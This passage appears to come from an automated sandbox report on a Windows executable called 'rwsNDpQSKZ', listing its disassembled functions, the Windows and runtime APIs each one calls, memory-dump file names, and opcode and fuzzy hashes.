                • ___AdjustPointer.LIBCMT ref: 00CE8627
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: AdjustPointer$Cmm@@State@Unlock@
                • String ID:
                • API String ID: 2638859718-0
                • Opcode ID: 7ac89c56fb92e8f67a0aa629db6dbaefef81eff721dc168f25b891c642a0c68a
                • Instruction ID: 173009e38507d5c029fe45c2b69fa0ab27a0f3b03058e285f857997cd60aeddb
                • Opcode Fuzzy Hash: 7ac89c56fb92e8f67a0aa629db6dbaefef81eff721dc168f25b891c642a0c68a
                • Instruction Fuzzy Hash: F551F372602686DFEB298F12C841BBA73A4EF50710F14452DEC1A572E1DF31ED49DB90
                Function 00CB6327 Relevance: 7.6, APIs: 5, Instructions: 140COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB632E
                • GetTickCount.KERNEL32 ref: 00CB635C
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?UIntToString@Cmm@@YAXIAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(00000000,00D33368,?,0000006C,00CB739B,?,?,?,?,00000000,?,?,?,?), ref: 00CB6394
                • ??H?$CStringT@_W@Cmm@@QBE?AV01@PB_W@Z.RWSNDPQSKZ(?,00D3D264,?,0000006C,00CB739B,?,?,?,?,00000000,?,?,?,?), ref: 00CB63A7
                • ??H?$CStringT@_W@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,?,?,0000006C,00CB739B,?,?,?,?,00000000,?,?,?,?), ref: 00CB63B7
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$V01@$CountDeallocateH_prolog3_String@TickV01@@W@1@@
                • String ID:
                • API String ID: 3329691095-0
                • Opcode ID: d57143a4fe07b6261308f3fb8c4b6d0a5f8127280142805f9d6940c5b5867bd2
                • Instruction ID: ec142894f740256c0d6b8cd049d8228784d87440339fd418d10446824f184b40
                • Opcode Fuzzy Hash: d57143a4fe07b6261308f3fb8c4b6d0a5f8127280142805f9d6940c5b5867bd2
                • Instruction Fuzzy Hash: B4514DB1900208EFCF14EFA5C8859EEBBB9FF58310F144119F905A7252DB34AA88DF60
                Function 00C5EC2C Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5EC33
                • #11.MAPI32(00000000,00000000,00000000,80000041,?,00000024,00C5C31F), ref: 00C5EC51
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,00000000,?,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5ECCB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,80000000,?,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5ECF1
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000100,?,?,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5ED14
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$H_prolog3_
                • String ID:
                • API String ID: 2729597131-0
                • Opcode ID: 8e88876212883e7612d95d653ef727104fd9b30847ebe937d6723ada3563da0a
                • Instruction ID: 9047ae16d23a1a7b13331d6b4bf720653e1f8aea6a9f43c1e0ddf6e5caf22981
                • Opcode Fuzzy Hash: 8e88876212883e7612d95d653ef727104fd9b30847ebe937d6723ada3563da0a
                • Instruction Fuzzy Hash: CF315E79A002199BDB18CFA5D884AEEBBB5FF48305F544018E912B7250DB71BE89CB64
                Function 00CB6230 Relevance: 7.6, APIs: 5, Instructions: 77threadCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB6237
                • ?GetThreadTelemetry@CCmmPerfTelemetry@@CA?AV?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@std@@XZ.RWSNDPQSKZ(?,0000001C,00CB4E3D,?), ref: 00CB625D
                  • Part of subcall function 00CB5200: __EH_prolog3.LIBCMT ref: 00CB5207
                  • Part of subcall function 00CB5200: EnterCriticalSection.KERNEL32(00DFFB3C,00000020,00CB5E5B,?,0000001C,00CB4DB0,?), ref: 00CB5215
                  • Part of subcall function 00CB5200: LeaveCriticalSection.KERNEL32(00DFFB3C,?,?), ref: 00CB52C4
                • EnterCriticalSection.KERNEL32(?,0000001C,00CB4E3D,?), ref: 00CB6276
                • SetEvent.KERNEL32(000000C8,?,00000005,?,?,?,?,?,?,?,000000C8), ref: 00CB62F8
                  • Part of subcall function 00CB9C14: __EH_prolog3.LIBCMT ref: 00CB9C1B
                  • Part of subcall function 00CB9C14: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,000000C8), ref: 00CB9C42
                • LeaveCriticalSection.KERNEL32(?,000000C8), ref: 00CB6302
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalSection$H_prolog3$EnterLeavePerfThread$??0?$Cmm@@EventEvents@StringTelemetry@Telemetry@@Telemetry@@@std@@V01@@V?$shared_ptr@
                • String ID:
                • API String ID: 988690219-0
                • Opcode ID: 9651e9da36570fd5912f56ba412d9f3f600b87e80d4a6f6523abe9a8c65ccfee
                • Instruction ID: 7d9cab4bfc8b0a76e8dce8316a50cf17883a7979a4b0030cfc58572ff86a1a04
                • Opcode Fuzzy Hash: 9651e9da36570fd5912f56ba412d9f3f600b87e80d4a6f6523abe9a8c65ccfee
                • Instruction Fuzzy Hash: B13159B190020AEBDF01DFE4C985AEEBBB9FF08300F104525F915A7251CB74AA85DBA0
                Function 00CB67C0 Relevance: 7.6, APIs: 5, Instructions: 77threadCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB67C7
                • ?GetThreadTelemetry@CCmmPerfTelemetry@@CA?AV?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@std@@XZ.RWSNDPQSKZ(?,00000020), ref: 00CB67ED
                  • Part of subcall function 00CB5200: __EH_prolog3.LIBCMT ref: 00CB5207
                  • Part of subcall function 00CB5200: EnterCriticalSection.KERNEL32(00DFFB3C,00000020,00CB5E5B,?,0000001C,00CB4DB0,?), ref: 00CB5215
                  • Part of subcall function 00CB5200: LeaveCriticalSection.KERNEL32(00DFFB3C,?,?), ref: 00CB52C4
                • EnterCriticalSection.KERNEL32(?,00000020), ref: 00CB6806
                • SetEvent.KERNEL32(000000C8,?,00000007,?,?,?,?,?,?,?,?,000000C8), ref: 00CB6888
                • LeaveCriticalSection.KERNEL32(?,000000C8), ref: 00CB6892
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalSection$EnterH_prolog3LeavePerfThread$EventEvents@Telemetry@Telemetry@@Telemetry@@@std@@V?$shared_ptr@
                • String ID:
                • API String ID: 3492326977-0
                • Opcode ID: 91e6586ecc71e922e86830f5f11a51a9d0a673040de2cfa446808cea3c4c5764
                • Instruction ID: 6fb62bf56608b392042f40f013ab3e6440a70dcb47a031ed3a7ac5206869c8ff
                • Opcode Fuzzy Hash: 91e6586ecc71e922e86830f5f11a51a9d0a673040de2cfa446808cea3c4c5764
                • Instruction Fuzzy Hash: E4315EB190021AEFCF01DFA4C9859EEBBB9FF08300F544525F905E7291CB74AA55DBA0
                Function 00CB64E0 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB64E7
                • ?GetThreadTelemetry@CCmmPerfTelemetry@@CA?AV?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@std@@XZ.RWSNDPQSKZ(?,00000014,00CB50B4,?,?,00000000,?,?,?,?,?,00D10300,000000FF), ref: 00CB6500
                • EnterCriticalSection.KERNEL32(?,00000014,00CB50B4,?,?,00000000,?,?,?,?,?,00D10300,000000FF), ref: 00CB651A
                • SetEvent.KERNEL32(000000C8,?,?,?,?,000000C8,?,000000C8,?,?,?,00D10300,000000FF), ref: 00CB659B
                • LeaveCriticalSection.KERNEL32(?,000000C8,?,?,?,00D10300,000000FF), ref: 00CB65A5
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalPerfSectionThread$EnterEventEvents@H_prolog3LeaveTelemetry@Telemetry@@Telemetry@@@std@@V?$shared_ptr@
                • String ID:
                • API String ID: 1684062195-0
                • Opcode ID: 36bad1bfd16e79a3ca9421500063995dbc59001ab86b19ca9d82ed64a3feb452
                • Instruction ID: 55cf17e5df1b18a4f722370d4d5c2b466330828fddab6f388d426c3b9d604630
                • Opcode Fuzzy Hash: 36bad1bfd16e79a3ca9421500063995dbc59001ab86b19ca9d82ed64a3feb452
                • Instruction Fuzzy Hash: B1214C7190025AAFCF15DFA4CC84AEEBB79FF08304F104415F515E7250CB74AA65DBA0
                Function 00CBAD50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBAD57
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004,00CBAD0C,?,?,00000004,00CBA485,?,00000018,00CB715A,?,?,?,?,00000000,00000008), ref: 00CBAD65
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,00000004,00CBAD0C,?,?,00000004,00CBA485,?,00000018,00CB715A,?,?,?,?,00000000), ref: 00CBAD75
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000004,00CBAD0C,?,?,00000004,00CBA485,?,00000018,00CB715A,?,?,?), ref: 00CBADC7
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,00000004,00CBAD0C,?,?,00000004,00CBA485,?,00000018,00CB715A,?,?,?), ref: 00CBAE6D
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$H_prolog3
                • String ID:
                • API String ID: 709177685-0
                • Opcode ID: 1792ed7b049db2113fff7d11f63860a1fb711eb01153ce4e0ab32b3b93b3ed57
                • Instruction ID: 1ade5c7aa119a6b6e75958393736d3a9434fca659e6ead5890491f088f0bb54a
                • Opcode Fuzzy Hash: 1792ed7b049db2113fff7d11f63860a1fb711eb01153ce4e0ab32b3b93b3ed57
                • Instruction Fuzzy Hash: 95412CB8A00B45AFC358CF29C180B96F7E0BF19304F40891EE9AAC3B41DB71B954DB91
                Function 00C5CBD9 Relevance: 7.6, APIs: 5, Instructions: 69threadCOMMON
                Download Yara Rule
                APIs
                • ?Stop@CIPCChannelThread@ssb_ipc@@QAEHXZ.RWSNDPQSKZ(?,?,?,?,?,?,00C5CBAB), ref: 00C5CBF0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,?,?,?,?,?,00C5CBAB), ref: 00C5CC05
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00C5CBAB), ref: 00C5CC1B
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00C5CBAB), ref: 00C5CC25
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,?,?,?,?,?,?,00C5CBAB), ref: 00C5CC49
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@CriticalSectionState@Unlock@$ChannelEnterLeaveStop@Thread@ssb_ipc@@
                • String ID:
                • API String ID: 2446349498-0
                • Opcode ID: 8d20171d0d73463125ea60963a57491a9d45f7a9693fc35ba5fddf13efb07967
                • Instruction ID: 08402fcd5903fcc2a7aab588456400e9106357eb408217627a90f81d2dd4b866
                • Opcode Fuzzy Hash: 8d20171d0d73463125ea60963a57491a9d45f7a9693fc35ba5fddf13efb07967
                • Instruction Fuzzy Hash: 71218E79600B16AFDB149F52D885A5AB7A8FF08712F004128ED069B341CB70FD89CBA8
                Function 00CDC26F Relevance: 7.6, APIs: 6, Instructions: 62memoryCOMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC28A
                • GetProcessHeap.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC29C
                • HeapAlloc.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2A3
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2BF
                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2CB
                • HeapFree.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2D2
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$ByteCharMultiProcessWide$AllocFree
                • String ID:
                • API String ID: 1621643742-0
                • Opcode ID: 7b5aac336e7fff9f0166d07c373b185611bc98dd063ab9956ff08b3c12240903
                • Instruction ID: 27bba9adbc8c2546c44162c1b359495b1782536f622d191738efde90124340c1
                • Opcode Fuzzy Hash: 7b5aac336e7fff9f0166d07c373b185611bc98dd063ab9956ff08b3c12240903
                • Instruction Fuzzy Hash: FA118271600205BFDB219B96CC48FAB7BBEEB89751F20421DF615D6290DB70DA02D770
                Function 00C62D90 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C62D97
                  • Part of subcall function 00C613F7: CreateFileW.KERNEL32(?,?,00000003,00000000,?,00000080,00000000,?,?,00C615C6,00000003,?), ref: 00C61417
                • ?GetSize@CFile@Cmm@@QBE_KXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DE5
                  • Part of subcall function 00C617D0: GetFileSize.KERNEL32(?,?), ref: 00C617E3
                • ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DEF
                • ?Read@CFile@Cmm@@QAEIPAXI@Z.RWSNDPQSKZ(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DF8
                • ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62E34
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$File@$File$Buffer@?$Close@CreateH_prolog3_Read@SizeSize@String
                • String ID:
                • API String ID: 2759880864-0
                • Opcode ID: 8e5f79f3acff214a4ea9a6270b7dff2c83ffc4f523f492a14cd41ca9b12e38a2
                • Instruction ID: 9918140f1862a1a965ea1539c36e46436bad37a143006351b4621fcefe1ecaa7
                • Opcode Fuzzy Hash: 8e5f79f3acff214a4ea9a6270b7dff2c83ffc4f523f492a14cd41ca9b12e38a2
                • Instruction Fuzzy Hash: 72118E72D0120CAECF11DFF4D881ADEBBB1AF04311F244029F911BB681EB706A49DB64
                Function 00CA8890 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA8897
                • ?GetNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEPAV123@ABVCCmmArchivePath@3@@Z.RWSNDPQSKZ(?,0000003C), ref: 00CA88A0
                  • Part of subcall function 00CA8A60: ?NameAt@CCmmArchivePath@Cmm@@QBEABV?$CStringT@_W@2@I@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,00CA88A5,?,0000003C), ref: 00CA8A8D
                  • Part of subcall function 00CA8A60: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,00CA88A5,?,0000003C), ref: 00CA8A9A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3C860,?,?,?,?,?,0000003C), ref: 00CA88D1
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • ?ToString@CCmmArchivePath@Cmm@@QBEXABV?$CStringT@_W@2@AAV32@@Z.RWSNDPQSKZ(?,?,00D3C860,?,?,?,?,?,0000003C), ref: 00CA88E4
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3C860,?,?,?,?,?,0000003C), ref: 00CA8932
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$ArchiveString$??0?$Node@Path@W@2@$Archive@H_prolog3H_prolog3_NamePath@3@@State@String@TreeUnlock@V123@V32@@
                • String ID:
                • API String ID: 276706240-0
                • Opcode ID: 56215b04d38fd81a5f2bc03c7f5e8029da56d28b0b320d00fad6a5a96898b93c
                • Instruction ID: c782d067c3a460760833fcf24713ced1db1cc246e2d1d517b3c51c4a00c8459f
                • Opcode Fuzzy Hash: 56215b04d38fd81a5f2bc03c7f5e8029da56d28b0b320d00fad6a5a96898b93c
                • Instruction Fuzzy Hash: 61113A74D00209DFCB00DFB5C4416EEBBB4EF08718F64506AE405B7241EB749B89DB69
                Function 00CA8950 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA8957
                • ?GetNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEPAV123@ABVCCmmArchivePath@3@@Z.RWSNDPQSKZ(?,0000003C), ref: 00CA8960
                  • Part of subcall function 00CA8A60: ?NameAt@CCmmArchivePath@Cmm@@QBEABV?$CStringT@_W@2@I@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,00CA88A5,?,0000003C), ref: 00CA8A8D
